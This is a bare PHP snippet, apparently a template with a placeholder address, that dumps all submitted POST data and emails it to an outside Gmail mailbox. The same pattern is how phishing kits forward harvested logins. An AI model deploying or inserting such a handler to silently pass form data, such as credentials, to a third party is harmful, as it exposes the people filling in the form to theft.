<?php ob_start(); print_r($_POST); $info = ob_get_contents(); ob_end_clean(); mail('PAVIZDYS@gmail.com', 'Pavadinimas', $info); ?>